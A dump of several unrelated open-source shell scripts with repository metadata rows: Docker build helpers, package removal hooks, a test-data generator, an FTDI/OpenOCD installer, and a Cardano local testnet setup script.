cd hbbft-posdao-contracts
npm ci
truffle compile
cd ..
#cp hbbft-posdao-contracts/build/contracts/*.json dmd-vision/ABI
# it became tremendously difficult to develop int dotnetcore 5,
# but the API generater Tool requires dotnetcore 2.1
# since docker runs in a complex permission setup,
# the created files are owned by root.
# the script might be able to improve by splitting up the Actions:
# docker run
# docker cp
# docker stop
# docker rm
echo "copying truffle build artifacts to dmd-vision"
# Generate C# Nethereum bindings from the truffle artifacts inside a
# dotnet 2.1 SDK container; both repos are bind-mounted so the generated
# files land directly under dmd-vision/Contracts.
#docker run -it --rm --mount type=bind,source="$(pwd)",target=/root mcr.microsoft.com/dotnet/sdk:2.1 dotnet tool install --global Nethereum.Generator.Console --version 3.6.1 && /root/.dotnet/tools/Nethereum.Generator.Console generate from-truffle --directory ~/hbbft-posdao-contracts/build/contracts --outputPath /root/dmd-vision/Contracts --namespace DMDVision.Contracts
docker run -it --rm --mount type=bind,source="$(pwd)"/hbbft-posdao-contracts,target=/root/hbbft-posdao-contracts --mount type=bind,source="$(pwd)"/dmd-vision,target=/root/dmd-vision mcr.microsoft.com/dotnet/sdk:2.1 bin/bash -c "dotnet tool install --global Nethereum.Generator.Console --version 3.6.1 && /root/.dotnet/tools/Nethereum.Generator.Console generate from-truffle --directory ~/hbbft-posdao-contracts/build/contracts --outputPath /root/dmd-vision/Contracts --namespace DMDVision.Contracts"
# docker run -it --rm --mount type=bind,source="$(pwd)"/hbbft-posdao-contracts,target=/root/hbbft-posdao-contracts --mount type=bind,source="$(pwd)"/dmd-vision,target=/root/dmd-vision mcr.microsoft.com/dotnet/sdk:2.1 dotnet tool install --global Nethereum.Generator.Console --version 3.6.1 && /bin/bash | true |
cad09cb73f521dc70e5206915640f41387f92235 | Shell | carlosroman/infrastructure-agent | /build/package/rpm/prerm-upstart.sh | UTF-8 | 196 | 3.109375 | 3 | [
"Apache-2.0"
] | permissive | #!/bin/sh
# On Upstart systems, stop the agent job before the package is removed.
if [ -e "/etc/init/newrelic-infra.conf" ]; then
	# grep's exit status tells us whether the job reports a "start" state;
	# its matching status line is still echoed, exactly as before.
	if initctl status newrelic-infra | grep start; then
		initctl stop newrelic-infra || exit $?
	fi
fi
| true |
fd9174f14dc8e8e0c1e15c8b08b393a42c7b10a1 | Shell | FauxFaux/debian-control | /m/mailgraph/mailgraph_1.14-17_all/postrm | UTF-8 | 1,943 | 3.625 | 4 | [] | no_license | #! /bin/sh
# postrm script for mailgraph
#
# see: dh_installdeb(1)
set -e
# This script is called twice during the removal of the package; once
# after the removal of the package's files from the system, and as
# the final step in the removal of this package, after the package's
# conffiles have been removed.
case "$1" in
remove|upgrade|failed-upgrade|abort-install|abort-upgrade|disappear)
;;
purge)
# Drop the ucf-managed defaults file plus every backup/variant ucf may have
# left behind, then deregister it from the ucf databases (if ucf is present).
for ext in '~' '%' .bak .ucf-new .ucf-old .ucf-dist; do
rm -f /etc/default/mailgraph$ext
done
rm -f /etc/default/mailgraph
if which ucf >/dev/null; then
ucf --purge /etc/default/mailgraph
fi
if which ucfr >/dev/null; then
ucfr --purge mailgraph /etc/default/mailgraph
fi
;;
*) echo "$0: didn't understand being called with \`$1'" 1>&2
exit 0;;
esac
# dh_installdeb will replace this with shell code automatically
# generated by other debhelper scripts.
# Automatically added by dh_installinit/11.3.5
if [ "$1" = "purge" ] ; then
update-rc.d mailgraph remove >/dev/null
fi
# In case this system is running systemd, we make systemd reload the unit files
# to pick up changes.
if [ -d /run/systemd/system ] ; then
systemctl --system daemon-reload >/dev/null || true
fi
# End automatically added section
# Automatically added by dh_installsystemd/11.3.5
if [ "$1" = "remove" ]; then
if [ -x "/usr/bin/deb-systemd-helper" ]; then
deb-systemd-helper mask 'mailgraph.service' >/dev/null || true
fi
fi
if [ "$1" = "purge" ]; then
if [ -x "/usr/bin/deb-systemd-helper" ]; then
deb-systemd-helper purge 'mailgraph.service' >/dev/null || true
deb-systemd-helper unmask 'mailgraph.service' >/dev/null || true
fi
fi
# End automatically added section
# Automatically added by dh_installdebconf/11.3.5
if [ "$1" = purge ] && [ -e /usr/share/debconf/confmodule ]; then
. /usr/share/debconf/confmodule
db_purge
fi
# End automatically added section
exit 0
| true |
27ff47936158afa08dba1919b5e7ec5917a3010c | Shell | mpekalski/MLDocker | /build_tf_docker.sh | UTF-8 | 1,366 | 3.65625 | 4 | [] | no_license | #!/bin/sh
# The script will first build tf:00,
# then if the $tf_rebuild variable is set it will
# recompile tensorflow (dropping container cont_tf_00 if exists).
# Further it will continue building tf:02 (form tf:01
# that should have been a result of compiling tensorflow
# on top oftf:00).
# At the end it will start a container tf (from tf:02),
# and run nvidia-smi to check if everything worked fine.
# In the end it will launch the container with bash.
#
# The tf container is launched with mapped local passwd and shadow
# folders so user can login to JupyterHub using local user credentials
# from the host machine. For safety reasons they are set to be read-only
# as everything in container is run as root (for now). This way
# user is not able to modify the content of files, without sudo.
# if [ ! -z ${tf_rebuild+x} ] || [ ! docker images | awk {'print$1":"$2'} | grep tf:01 > /dev/null]; then
#it should check hash of tf:00 if it changed then init tf_rebuild
# NOTE(review): as committed, only the build/run/exec chain below is live --
# the tf:01/tf:02 rebuild stages described above are not implemented here.
nvidia-docker build -f Dockerfile.tf_00 -t tf:00 . && \
nvidia-docker run -d --ipc=host -v /etc/passwd:/etc/passwd:ro -v /etc/shadow:/etc/shadow:ro -v /home/$USER:/home/$USER --name tf tf:00 && \
nvidia-docker exec -it -u root tf bash -c "nvidia-smi" && \
nvidia-docker inspect $(docker ps -a | grep tf:00 | awk {'print$1'}) | grep \"IPAddress && \
nvidia-docker exec -it -u root tf bash
| true |
a9da41b52740db8b636a9a27b4457287cde14c4d | Shell | tjmacke/covid-19-analysis | /scripts/mk_cc_dict.sh | UTF-8 | 865 | 3.484375 | 3 | [
"MIT"
] | permissive | #! /bin/bash
#
# mk_cc_dict.sh [ -help ] [ raw-country-code-file ]
# Convert a raw country-code CSV into a 3-column TSV dictionary
# (country, ISO alpha-2, ISO alpha-3), printing "." for missing codes.
. ~/etc/funcs.sh
U_MSG="usage: $0 [ -help ] [ raw-country-code-file ]"
if [ -z "$WM_HOME" ] ; then
	LOG ERROR "WM_HOME not defined"
	exit 1
fi
WM_BIN=$WM_HOME/bin
FILE=
while [ $# -gt 0 ] ; do
	case $1 in
	-help)
		echo "$U_MSG"
		exit 0
		;;
	-*)
		LOG ERROR "unknown option $1"
		echo "$U_MSG" 1>&2
		exit 1
		;;
	*)
		FILE=$1
		shift
		break
		;;
	esac
done
if [ $# -ne 0 ] ; then
	LOG ERROR "extra arguments $*"
	echo "$U_MSG" 1>&2
	exit 1
fi
# $FILE is deliberately unquoted: when empty it disappears from the command
# line entirely and csv2tsv falls back to reading stdin.
$WM_BIN/csv2tsv $FILE |
awk -F'\t' 'NR == 1 {
	for(i = 1; i <= NF; i++)
		ftab[$i] = i
	pr_hdr = 1
}
NR > 1 {
	if(pr_hdr){
		pr_hdr = 0
		printf("%s\t%s\t%s\n", "country", "cc2", "cc3")
	}
	printf("%s", $(ftab["Country"]))
	printf("\t%s", $(ftab["Alpha-2 code"]) != "" ? $(ftab["Alpha-2 code"]) : ".")
	printf("\t%s", $(ftab["Alpha-3 code"]) != "" ? $(ftab["Alpha-3 code"]) : ".")
	printf("\n")
}'
| true |
5ee4cbd959d2436ee6b72adc6ade081ae31f63d3 | Shell | xuzijian629/pace2020 | /src/build-submit-binary.sh | UTF-8 | 418 | 3.0625 | 3 | [
"MIT"
] | permissive | #!/bin/bash
set -e
##### EDIT HERE #####
BASE_FILE=min-sep.cpp
#####################
# Resolve the repository root relative to this script.
# NOTE(review): $0 and $base_dir are unquoted -- breaks if the checkout path
# contains spaces (it would also break the docker -v mapping below); confirm.
base_dir=$(dirname $0)/..
abs_base_dir=$(cd $base_dir && pwd -P)
echo building cpp files
# Build a fully static binary inside a gcc 9.3 container, then package it
# as the submission tarball (moved up one level to src/../main.tgz).
docker run -v $abs_base_dir:$abs_base_dir gcc:9.3 bash -c "\
g++ -Ofast -std=c++17 -mpopcnt -static -o $abs_base_dir/src/main $abs_base_dir/src/$BASE_FILE &&
cd $abs_base_dir/src &&
tar -czvf main.tgz main &&
mv main.tgz .."
| true |
9c4eb377056762e002c51f63111e450e9dedf9c6 | Shell | AngelPn/Systems-Programming | /vaccineMonitor/testFile.sh | UTF-8 | 3,428 | 4.28125 | 4 | [] | no_license | #!/bin/bash
# Check if exactly 4 arguments are provided
if [ "$#" -ne 4 ]; then
echo "You must enter exactly 4 command line arguments"
echo "./testFile.sh virusesFile countriesFile numLines duplicatesAllowed"
exit 1
fi
# Keep arguments
virusesFile=$1
countriesFile=$2
numLines=$3
duplicatesAllowed=$4
# Go to testFiles directory
cd testFiles
# Check if virusesFile and countriesFile exist
# and if the two numbers given are greater than 0
# NOTE(review): the numeric test actually checks "< 0", so 0 passes even
# though the messages promise "greater than 0" -- confirm intended bound.
if [ ! -e ${virusesFile} -o ! -e ${countriesFile} ]; then
echo "Given files do not exist in testFiles directory"
exit 1
elif [ ${numLines} -lt "0" -o ${duplicatesAllowed} -lt "0" ]; then
echo "Provided numbers are not greater than 0"
exit 1
fi
# Create arrays with the viruses and countries
viruses+=($(cat ${virusesFile}))
countries+=($(cat ${countriesFile}))
# Create array of IDs: ID is a number from 1 to 9999
# If duplicates are not allowed or numLines < 10000, generate unique IDs
if [ ${duplicatesAllowed} -eq "0" -a ${numLines} -le "10000" ]; then
ids=($(shuf -i 1-9999 -n $numLines))
# Else generate IDs randomly with duplicates
else
if [ ${duplicatesAllowed} -eq "0" ]; then
echo "Given numLines > 10K, so duplicates will be allowed..."
fi
# Get shuffled IDs
shuf_ids=($(shuf -i 1-9999))
# Emit runs of 1-20 copies of each shuffled ID until numLines are filled;
# when the pool runs dry on huge inputs, the last ID pads out the remainder.
for ((i = 0; i < numLines; )); do
# x represents how many times the ID will be duplicated
if [ ${numLines} -gt "10000" -a ${#shuf_ids[@]} -eq "1" ]; then
x=$((numLines-i))
else
x=$((RANDOM % 20 + 1))
fi
for ((j = 0; j < x; j++)); do
ids[i]=${shuf_ids[0]}
i=$(( $i + 1 ))
done
# Remove first element in shuf_ids
shuf_ids=("${shuf_ids[@]:1}")
done
fi
# Emit a random string of lowercase letters on stdout; length is given in $1.
rand-str() {
    # Keep only a-z from the kernel's random byte stream, then truncate
    # the surviving characters to the requested length.
    tr -dc 'a-z' < /dev/urandom | head -c "$1"
}
# Map the numeric argument to a flag string: 0 -> "YES", anything else -> "NO".
yes-no() {
    local answer="NO"
    [ "$1" -eq 0 ] && answer="YES"
    echo "$answer"
}
# Create inputFile
touch inputFile
# Append one record for citizen "$1" (the string "id first last country age"):
# picks a random virus, randomly decides vaccinated YES/NO, and -- always for
# YES, and half of the time for NO -- appends a random DD-MM-YYYY date.
# Reads global array: viruses[]. Appends to: inputFile.
function write-in-File(){
index_virus=$((RANDOM % ${#viruses[@]}))
virus=${viruses[index_virus]}
vaccinated=$(yes-no $((RANDOM % 2)))
if [ "$vaccinated" = "YES" -o $((RANDOM % 2)) -eq "0" ]; then
# Create random date
# NOTE(review): the day is drawn 1-31 regardless of month, so impossible
# dates such as 31-02 can be produced -- confirm whether that is acceptable.
dd=$((RANDOM % 31 + 1))
mm=$((RANDOM % 12 + 1))
yyyy=$((RANDOM % 3 + 2018))
# Make sure both day and month are 2 digits
if [ $dd -lt "10" ]; then
dd="0${dd}"
fi
if [ $mm -lt "10" ]; then
mm="0${mm}"
fi
date=$dd-$mm-$yyyy
echo $1 $virus $vaccinated $date >> inputFile
else
echo $1 $virus $vaccinated >> inputFile
fi
}
# For the number of lines
# NOTE(review): the loop bound is numLines - 1, so with unique IDs the file
# holds one record fewer than requested -- confirm whether this off-by-one
# is intentional (it avoids reading ids[i+1] past the end below).
for ((i = 0; i < numLines - 1; i++)); do
# Create citizen's record
id=${ids[i]}
firstname=$(rand-str $((RANDOM % 12 + 3)))
lastname=$(rand-str $((RANDOM % 12 + 3)))
index_country=$((RANDOM % ${#countries[@]}))
country=${countries[index_country]}
age=$((RANDOM % 120 + 1))
write-in-File "$id $firstname $lastname $country $age"
# For every time this citizen is duplicated, write in file
# (consecutive equal IDs share one identity; i is advanced past them here)
while [ $(( $i + 1 )) -le ${numLines} -a "$id" = "${ids[i+1]}" ]; do
write-in-File "$id $firstname $lastname $country $age"
i=$(( $i + 1 ))
done
done
cd ../ | true |
3749f73e5bb93da76c7638157d6b37558d5859ae | Shell | tarraschk/ECN-EI3Info-TREEL | /install/1-build-d2xx-openOCD/build-and-install.command | UTF-8 | 596 | 3.53125 | 4 | [] | no_license | #!/bin/sh
# Build and install the FTDI D2XX driver (macOS only) and OpenOCD.
# Every step is chained with && so the script stops at the first failure.
# Fixes: backticks replaced with $(...), and $0/$DIR/$OPERATING_SYSTEM are
# quoted so the script survives installation paths containing spaces
# (common for macOS .command files); the odd escaped `\=` is plain `=`.
set -x
DIR=$(dirname "$0") &&
OPERATING_SYSTEM=$(uname -s) &&
echo "OPERATING_SYSTEM: $OPERATING_SYSTEM" &&
cd "$DIR" &&
if [ "$OPERATING_SYSTEM" = Darwin ] ; then
#--- Create directories, install FTDI headers
sudo mkdir -p /usr/local/lib /usr/local/include &&
sudo cp drivers-d2xx/ftd2xx.h /usr/local/include/ &&
sudo cp drivers-d2xx/WinTypes.h /usr/local/include/ &&
#--- Install FTDI Library
./drivers-d2xx/"$OPERATING_SYSTEM"/build-and-install-d2xx.command
fi &&
#--- OPENOCD
./open-ocd/build-and-install-openocd-"$OPERATING_SYSTEM".command &&
#---
echo "----------- Success!"
| true |
19f12e99bd5ca4f083d235285356f38e6e431a8f | Shell | Ravendexlabs/cardano-node | /scripts/byron-to-alonzo/mkfiles.sh | UTF-8 | 22,936 | 3.84375 | 4 | [
"Apache-2.0"
] | permissive | #!/usr/bin/env bash
set -e
# Unofficial bash strict mode.
# See: http://redsymbol.net/articles/unofficial-bash-strict-mode/
set -u
set -o pipefail
# This script sets up a cluster that starts out in Byron, and can transition to Mary.
#
# The script generates all the files needed for the setup, and prints commands
# to be run manually (to start the nodes, post transactions, etc.).
#
# There are three ways of triggering the transition to Shelley:
# 1. Trigger transition at protocol version 2.0.0 (as on mainnet)
# The system starts at 0.0.0, and we can only increase it by 1 in the major
# version, so this does require to
# a) post an update proposal and votes to transition to 1.0.0
# b) wait for the protocol to change (end of the epoch, or end of the last
# epoch if it's posted near the end of the epoch)
# c) change configuration.yaml to have 'LastKnownBlockVersion-Major: 2',
# and restart the nodes
# d) post an update proposal and votes to transition to 2.0.0
# This is what will happen on the mainnet, so it's vital to test this, but
# it does contain some manual steps.
# 2. Trigger transition at protocol version 2.0.0
# For testing purposes, we can also modify the system to do the transition to
# Shelley at protocol version 1.0.0, by uncommenting the line containing
# 'TestShelleyHardForkAtVersion' below. Then, we just need to execute step a)
# above in order to trigger the transition.
# This is still close to the procedure on the mainnet, and requires less
# manual steps.
# 3. Schedule transition in the configuration
# To do this, uncomment the line containing 'TestShelleyHardForkAtEpoch'
# below. It's good for a quick test, and does not rely on posting update
# proposals to the chain.
# This is quite convenient, but it does not test that we can do the
# transition by posting update proposals to the network. For even more convenience
# if you want to start a node in Shelley, Allegra or Mary from epoch 0, supply the script
# with a shelley, allegra or mary string argument. E.g mkfiles.sh mary.
ROOT=example
BFT_NODES="node-bft1 node-bft2"
BFT_NODES_N="1 2"
NUM_BFT_NODES=2
POOL_NODES="node-pool1"
ALL_NODES="${BFT_NODES} ${POOL_NODES}"
INIT_SUPPLY=10020000000
FUNDS_PER_GENESIS_ADDRESS=$((${INIT_SUPPLY} / ${NUM_BFT_NODES}))
FUNDS_PER_BYRON_ADDRESS=$((${FUNDS_PER_GENESIS_ADDRESS} - 1000000))
# We need to allow for a fee to transfer the funds out of the genesis.
# We don't care too much, 1 ada is more than enough.
NETWORK_MAGIC=42
SECURITY_PARAM=10
UNAME=$(uname -s) DATE=
case $UNAME in
Darwin ) DATE="gdate";;
Linux ) DATE="date";;
MINGW64_NT* ) UNAME="Windows_NT"
DATE="date";;
esac
# Translate a socket path into its platform-specific form. On Windows,
# named pipes must look like "\\.\pipe\PipeName" (see
# https://docs.microsoft.com/en-us/windows/win32/ipc/pipe-names), so the
# pipe-namespace prefix is prepended and slashes become backslashes;
# on every other platform the path is passed through unchanged.
sprocket() {
    case "$UNAME" in
        Windows_NT)
            printf '%s' '\\.\pipe\'
            echo "$1" | sed 's|/|\\|g'
            ;;
        *)
            echo "$1"
            ;;
    esac
}
START_TIME="$(${DATE} -d "now + 30 seconds" +%s)"
if ! mkdir "${ROOT}"; then
echo "The ${ROOT} directory already exists, please move or remove it"
exit
fi
# copy and tweak the configuration
cp configuration/defaults/byron-mainnet/configuration.yaml ${ROOT}/
sed -i ${ROOT}/configuration.yaml \
-e 's/Protocol: RealPBFT/Protocol: Cardano/' \
-e '/Protocol/ aPBftSignatureThreshold: 0.6' \
-e 's/minSeverity: Info/minSeverity: Debug/' \
-e 's|GenesisFile: genesis.json|ByronGenesisFile: byron/genesis.json|' \
-e '/ByronGenesisFile/ aShelleyGenesisFile: shelley/genesis.json' \
-e '/ByronGenesisFile/ aAlonzoGenesisFile: shelley/genesis.alonzo.json' \
-e 's/RequiresNoMagic/RequiresMagic/' \
-e 's/LastKnownBlockVersion-Major: 0/LastKnownBlockVersion-Major: 1/' \
-e 's/LastKnownBlockVersion-Minor: 2/LastKnownBlockVersion-Minor: 0/'
# Options for making it easier to trigger the transition to Shelley
# If neither of those are used, we have to
# - post an update proposal + votes to go to protocol version 1
# - after that's activated, change the configuration to have
# 'LastKnownBlockVersion-Major: 2', and restart the nodes
# - post another proposal + vote to go to protocol version 2
#uncomment this for an automatic transition after the first epoch
# echo "TestShelleyHardForkAtEpoch: 1" >> ${ROOT}/configuration.yaml
#uncomment this to trigger the hardfork with protocol version 1
#echo "TestShelleyHardForkAtVersion: 1" >> ${ROOT}/configuration.yaml
pushd ${ROOT}
# create the node directories
for NODE in ${ALL_NODES}; do
mkdir "${NODE}" "${NODE}/byron" "${NODE}/shelley"
done
# Make topology files
#TODO generalise this over the N BFT nodes and pool nodes
cat > node-bft1/topology.json <<EOF
{
"Producers": [
{
"addr": "127.0.0.1",
"port": 3002,
"valency": 1
}
, {
"addr": "127.0.0.1",
"port": 3003,
"valency": 1
}
]
}
EOF
echo 3001 > node-bft1/port
cat > node-bft2/topology.json <<EOF
{
"Producers": [
{
"addr": "127.0.0.1",
"port": 3001,
"valency": 1
}
, {
"addr": "127.0.0.1",
"port": 3003,
"valency": 1
}
]
}
EOF
echo 3002 > node-bft2/port
cat > node-pool1/topology.json <<EOF
{
"Producers": [
{
"addr": "127.0.0.1",
"port": 3001,
"valency": 1
}
, {
"addr": "127.0.0.1",
"port": 3002,
"valency": 1
}
]
}
EOF
echo 3003 > node-pool1/port
cat > byron.genesis.spec.json <<EOF
{
"heavyDelThd": "300000000000",
"maxBlockSize": "2000000",
"maxTxSize": "4096",
"maxHeaderSize": "2000000",
"maxProposalSize": "700",
"mpcThd": "20000000000000",
"scriptVersion": 0,
"slotDuration": "1000",
"softforkRule": {
"initThd": "900000000000000",
"minThd": "600000000000000",
"thdDecrement": "50000000000000"
},
"txFeePolicy": {
"multiplier": "43946000000",
"summand": "155381000000000"
},
"unlockStakeEpoch": "18446744073709551615",
"updateImplicit": "10000",
"updateProposalThd": "100000000000000",
"updateVoteThd": "1000000000000"
}
EOF
cardano-cli byron genesis genesis \
--protocol-magic ${NETWORK_MAGIC} \
--start-time "${START_TIME}" \
--k ${SECURITY_PARAM} \
--n-poor-addresses 0 \
--n-delegate-addresses ${NUM_BFT_NODES} \
--total-balance ${INIT_SUPPLY} \
--delegate-share 1 \
--avvm-entry-count 0 \
--avvm-entry-balance 0 \
--protocol-parameters-file byron.genesis.spec.json \
--genesis-output-dir byron
mv byron.genesis.spec.json byron/genesis.spec.json
# Symlink the BFT operator keys from the genesis delegates, for uniformity
for N in ${BFT_NODES_N}; do
ln -s ../../byron/delegate-keys.00$((${N} - 1)).key "node-bft${N}/byron/delegate.key"
ln -s ../../byron/delegation-cert.00$((${N} - 1)).json "node-bft${N}/byron/delegate.cert"
done
# Create keys, addresses and transactions to withdraw the initial UTxO into
# regular addresses.
for N in ${BFT_NODES_N}; do
cardano-cli byron key keygen \
--secret byron/payment-keys.00$((${N} - 1)).key \
cardano-cli byron key signing-key-address \
--testnet-magic 42 \
--secret byron/payment-keys.00$((${N} - 1)).key > byron/address-00$((${N} - 1))
cardano-cli byron key signing-key-address \
--testnet-magic 42 \
--secret byron/genesis-keys.00$((${N} - 1)).key > byron/genesis-address-00$((${N} - 1))
cardano-cli byron transaction issue-genesis-utxo-expenditure \
--genesis-json byron/genesis.json \
--testnet-magic 42 \
--tx tx$((${N} - 1)).tx \
--wallet-key byron/delegate-keys.00$((${N} - 1)).key \
--rich-addr-from "$(head -n 1 byron/genesis-address-00$((${N} - 1)))" \
--txout "(\"$(head -n 1 byron/address-00$((${N} - 1)))\", $FUNDS_PER_BYRON_ADDRESS)"
done
# Update Proposal and votes
cardano-cli byron governance create-update-proposal \
--filepath update-proposal \
--testnet-magic 42 \
--signing-key byron/delegate-keys.000.key \
--protocol-version-major 1 \
--protocol-version-minor 0 \
--protocol-version-alt 0 \
--application-name "cardano-sl" \
--software-version-num 1 \
--system-tag "linux" \
--installer-hash 0
for N in ${BFT_NODES_N}; do
cardano-cli byron governance create-proposal-vote \
--proposal-filepath update-proposal \
--testnet-magic 42 \
--signing-key byron/delegate-keys.00$((${N} - 1)).key \
--vote-yes \
--output-filepath update-vote.00$((${N} - 1))
done
cardano-cli byron governance create-update-proposal \
--filepath update-proposal-1 \
--testnet-magic 42 \
--signing-key byron/delegate-keys.000.key \
--protocol-version-major 2 \
--protocol-version-minor 0 \
--protocol-version-alt 0 \
--application-name "cardano-sl" \
--software-version-num 1 \
--system-tag "linux" \
--installer-hash 0
for N in ${BFT_NODES_N}; do
cardano-cli byron governance create-proposal-vote \
--proposal-filepath update-proposal-1 \
--testnet-magic 42 \
--signing-key byron/delegate-keys.00$((${N} - 1)).key \
--vote-yes \
--output-filepath update-vote-1.00$((${N} - 1))
done
echo "====================================================================="
echo "Generated genesis keys and genesis files:"
echo
ls -1 byron/*
echo "====================================================================="
# Set up our template
mkdir shelley
cardano-cli genesis create --testnet-magic 42 --genesis-dir shelley
# Then edit the genesis.spec.json ...
# We're going to use really quick epochs (300 seconds), by using short slots 0.2s
# and K=10, but we'll keep long KES periods so we don't have to bother
# cycling KES keys
sed -i shelley/genesis.spec.json \
-e 's/"slotLength": 1/"slotLength": 0.1/' \
-e 's/"activeSlotsCoeff": 5.0e-2/"activeSlotsCoeff": 0.1/' \
-e 's/"securityParam": 2160/"securityParam": 10/' \
-e 's/"epochLength": 432000/"epochLength": 500/' \
-e 's/"maxLovelaceSupply": 0/"maxLovelaceSupply": 1000000000000/' \
-e 's/"decentralisationParam": 1.0/"decentralisationParam": 0.7/' \
-e 's/"major": 0/"major": 5/' \
-e 's/"rho": 0.0/"rho": 0.1/' \
-e 's/"tau": 0.0/"tau": 0.1/' \
-e 's/"updateQuorum": 5/"updateQuorum": 2/'
# Now generate for real:
cardano-cli genesis create \
--testnet-magic 42 \
--genesis-dir shelley/ \
--gen-genesis-keys ${NUM_BFT_NODES} \
--gen-utxo-keys 1
cardano-cli stake-address key-gen \
--verification-key-file shelley/utxo-keys/utxo-stake.vkey \
--signing-key-file shelley/utxo-keys/utxo-stake.skey
cardano-cli address key-gen \
--verification-key-file shelley/utxo-keys/utxo2.vkey \
--signing-key-file shelley/utxo-keys/utxo2.skey
cardano-cli stake-address key-gen \
--verification-key-file shelley/utxo-keys/utxo2-stake.vkey \
--signing-key-file shelley/utxo-keys/utxo2-stake.skey
echo "====================================================================="
echo "Generated genesis keys and genesis files:"
echo
ls -1 shelley/*
echo "====================================================================="
echo "Generated shelley/genesis.json:"
echo
cat shelley/genesis.json
echo
echo "====================================================================="
# Make the pool operator cold keys
# This was done already for the BFT nodes as part of the genesis creation
for NODE in ${POOL_NODES}; do
cardano-cli node key-gen \
--cold-verification-key-file ${NODE}/shelley/operator.vkey \
--cold-signing-key-file ${NODE}/shelley/operator.skey \
--operational-certificate-issue-counter-file ${NODE}/shelley/operator.counter
cardano-cli node key-gen-VRF \
--verification-key-file ${NODE}/shelley/vrf.vkey \
--signing-key-file ${NODE}/shelley/vrf.skey
done
# Symlink the BFT operator keys from the genesis delegates, for uniformity
for N in ${BFT_NODES_N}; do
ln -s ../../shelley/delegate-keys/delegate${N}.skey node-bft${N}/shelley/operator.skey
ln -s ../../shelley/delegate-keys/delegate${N}.vkey node-bft${N}/shelley/operator.vkey
ln -s ../../shelley/delegate-keys/delegate${N}.counter node-bft${N}/shelley/operator.counter
ln -s ../../shelley/delegate-keys/delegate${N}.vrf.vkey node-bft${N}/shelley/vrf.vkey
ln -s ../../shelley/delegate-keys/delegate${N}.vrf.skey node-bft${N}/shelley/vrf.skey
done
# Make hot keys and for all nodes
for NODE in ${ALL_NODES}; do
cardano-cli node key-gen-KES \
--verification-key-file ${NODE}/shelley/kes.vkey \
--signing-key-file ${NODE}/shelley/kes.skey
cardano-cli node issue-op-cert \
--kes-period 0 \
--kes-verification-key-file ${NODE}/shelley/kes.vkey \
--cold-signing-key-file ${NODE}/shelley/operator.skey \
--operational-certificate-issue-counter-file ${NODE}/shelley/operator.counter \
--out-file ${NODE}/shelley/node.cert
done
echo "Generated node operator keys (cold, hot) and operational certs:"
echo
ls -1 ${ALL_NODES}
echo "====================================================================="
# Make some payment and stake addresses
# user1..n: will own all the funds in the system, we'll set this up from
# initial utxo the
# pool-owner1..n: will be the owner of the pools and we'll use their reward
# account for pool rewards
USER_ADDRS="user1"
POOL_ADDRS="pool-owner1"
ADDRS="${USER_ADDRS} ${POOL_ADDRS}"
mkdir addresses
for ADDR in ${ADDRS}; do
# Payment address keys
cardano-cli address key-gen \
--verification-key-file addresses/${ADDR}.vkey \
--signing-key-file addresses/${ADDR}.skey
# Stake address keys
cardano-cli stake-address key-gen \
--verification-key-file addresses/${ADDR}-stake.vkey \
--signing-key-file addresses/${ADDR}-stake.skey
# Payment addresses
cardano-cli address build \
--payment-verification-key-file addresses/${ADDR}.vkey \
--stake-verification-key-file addresses/${ADDR}-stake.vkey \
--testnet-magic 42 \
--out-file addresses/${ADDR}.addr
# Stake addresses
cardano-cli stake-address build \
--stake-verification-key-file addresses/${ADDR}-stake.vkey \
--testnet-magic 42 \
--out-file addresses/${ADDR}-stake.addr
# Stake addresses registration certs
cardano-cli stake-address registration-certificate \
--stake-verification-key-file addresses/${ADDR}-stake.vkey \
--out-file addresses/${ADDR}-stake.reg.cert
done
# user N will delegate to pool N
USER_POOL_N="1"
for N in ${USER_POOL_N}; do
# Stake address delegation certs
cardano-cli stake-address delegation-certificate \
--stake-verification-key-file addresses/user${N}-stake.vkey \
--cold-verification-key-file node-pool${N}/shelley/operator.vkey \
--out-file addresses/user${N}-stake.deleg.cert
ln -s ../addresses/pool-owner${N}-stake.vkey node-pool${N}/owner.vkey
ln -s ../addresses/pool-owner${N}-stake.skey node-pool${N}/owner.skey
done
echo "Generated payment address keys, stake address keys,"
echo "stake address regitration certs, and stake address delegatation certs"
echo
ls -1 addresses/
echo "====================================================================="
# Next is to make the stake pool registration cert
for NODE in ${POOL_NODES}; do
cardano-cli stake-pool registration-certificate \
--testnet-magic 42 \
--pool-pledge 0 --pool-cost 0 --pool-margin 0 \
--cold-verification-key-file ${NODE}/shelley/operator.vkey \
--vrf-verification-key-file ${NODE}/shelley/vrf.vkey \
--reward-account-verification-key-file ${NODE}/owner.vkey \
--pool-owner-stake-verification-key-file ${NODE}/owner.vkey \
--out-file ${NODE}/registration.cert
done
echo "Generated stake pool registration certs:"
ls -1 node-*/registration.cert
echo "====================================================================="
echo "So you can now do various things:"
echo " * Start the nodes"
echo " * Initiate successive protocol updates"
echo " * Query the node's ledger state"
echo
echo "To start the nodes, in separate terminals use the following scripts:"
echo
mkdir -p run
for NODE in ${BFT_NODES}; do
(
echo "#!/usr/bin/env bash"
echo ""
echo "cardano-node run \\"
echo " --config ${ROOT}/configuration.yaml \\"
echo " --topology ${ROOT}/${NODE}/topology.json \\"
echo " --database-path ${ROOT}/${NODE}/db \\"
echo " --socket-path '$(sprocket "${ROOT}/${NODE}/node.sock")' \\"
echo " --shelley-kes-key ${ROOT}/${NODE}/shelley/kes.skey \\"
echo " --shelley-vrf-key ${ROOT}/${NODE}/shelley/vrf.skey \\"
echo " --shelley-operational-certificate ${ROOT}/${NODE}/shelley/node.cert \\"
echo " --port $(cat ${NODE}/port) \\"
echo " --delegation-certificate ${ROOT}/${NODE}/byron/delegate.cert \\"
echo " --signing-key ${ROOT}/${NODE}/byron/delegate.key \\"
echo " | tee -a ${ROOT}/${NODE}/node.log"
) > run/${NODE}.sh
chmod a+x run/${NODE}.sh
echo $ROOT/run/${NODE}.sh
done
for NODE in ${POOL_NODES}; do
(
echo "#!/usr/bin/env bash"
echo ""
echo "cardano-node run \\"
echo " --config ${ROOT}/configuration.yaml \\"
echo " --topology ${ROOT}/${NODE}/topology.json \\"
echo " --database-path ${ROOT}/${NODE}/db \\"
echo " --socket-path '$(sprocket "${ROOT}/${NODE}/node.sock")' \\"
echo " --shelley-kes-key ${ROOT}/${NODE}/shelley/kes.skey \\"
echo " --shelley-vrf-key ${ROOT}/${NODE}/shelley/vrf.skey \\"
echo " --shelley-operational-certificate ${ROOT}/${NODE}/shelley/node.cert \\"
echo " --port $(cat ${NODE}/port) \\"
echo " | tee -a ${ROOT}/${NODE}/node.log"
) > run/${NODE}.sh
chmod a+x run/${NODE}.sh
echo $ROOT/run/${NODE}.sh
done
